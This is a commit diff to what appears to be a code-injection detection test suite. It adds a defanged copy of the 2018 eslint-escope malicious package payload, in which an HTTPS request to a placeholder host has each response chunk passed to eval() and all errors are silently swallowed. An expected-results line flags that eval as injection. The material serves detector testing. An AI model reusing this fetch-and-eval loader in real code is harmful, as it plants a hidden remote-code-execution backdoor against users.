JavaScript: add the ESLint attack as a test

rdmarsh2 · rdmarsh2 · commit 7fe5620e693b · 2018-08-14T12:59:41.000-07:00
diff --git a/javascript/ql/test/query-tests/Security/CWE-094/CodeInjection.expected b/javascript/ql/test/query-tests/Security/CWE-094/CodeInjection.expected
@@ -12,6 +12,7 @@
 | angularjs.js:47:16:47:30 | document.cookie | $@ flows to here and is interpreted as code. | angularjs.js:47:16:47:30 | document.cookie | User-provided value |
 | angularjs.js:50:22:50:36 | document.cookie | $@ flows to here and is interpreted as code. | angularjs.js:50:22:50:36 | document.cookie | User-provided value |
 | angularjs.js:53:32:53:46 | document.cookie | $@ flows to here and is interpreted as code. | angularjs.js:53:32:53:46 | document.cookie | User-provided value |
+| eslint-escope-build.js:21:16:21:16 | c | $@ flows to here and is interpreted as code. | eslint-escope-build.js:20:22:20:22 | c | User-provided value |
 | express.js:7:24:7:69 | "return ...  + "];" | $@ flows to here and is interpreted as code. | express.js:7:44:7:62 | req.param("wobble") | User-provided value |
 | express.js:9:34:9:79 | "return ...  + "];" | $@ flows to here and is interpreted as code. | express.js:9:54:9:72 | req.param("wobble") | User-provided value |
 | express.js:12:8:12:53 | "return ...  + "];" | $@ flows to here and is interpreted as code. | express.js:12:28:12:46 | req.param("wobble") | User-provided value |
diff --git a/javascript/ql/test/query-tests/Security/CWE-094/eslint-escope-build.js b/javascript/ql/test/query-tests/Security/CWE-094/eslint-escope-build.js
@@ -0,0 +1,27 @@
+// the eslint-escope attack, with the URL altered to avoid triggering antivirus software.
+// See https://eslint.org/blog/2018/07/postmortem-for-malicious-package-publishes
+
+try {
+  var https = require("https");
+  https
+    .get(
+      {
+        hostname: "example.com",
+        path: "modified/to/avoid/antivirus",
+        headers: {
+          "User-Agent":
+            "Mozilla/5.0 (Windows NT 6.1; rv:52.0) Gecko/20100101 Firefox/52.0",
+          Accept:
+            "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8"
+        }
+      },
+      r => {
+        r.setEncoding("utf8");
+        r.on("data", c => {
+          eval(c);
+        });
+        r.on("error", () => {});
+      }
+    )
+    .on("error", () => {});
+} catch (e) {}
